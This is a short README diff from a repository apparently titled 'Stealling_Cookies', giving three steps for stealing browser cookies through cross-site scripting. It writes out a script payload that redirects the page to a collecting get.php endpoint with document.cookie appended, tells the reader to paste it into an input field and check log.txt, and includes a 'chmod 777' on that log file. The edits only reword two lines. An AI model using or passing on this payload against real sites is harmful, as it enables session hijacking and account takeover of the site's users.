YasserREED/Stealling_Cookies/README.md

 YasserREED> sudo chmod 777 log.txt

-# Send The Cookie to log.txt by get.php using window.location() function
+# Send The Cookie to log.txt by get.php using window.location()

 1 - Write The Payload:

 <script> window.location='https://127.0.0.1/get.php?cookie='+document.cookie </script>

-2 - Paste to input filed.
+2 - Paste into input filed.

 3 - Check log.txt. //if not showen you can refresh the page 🔄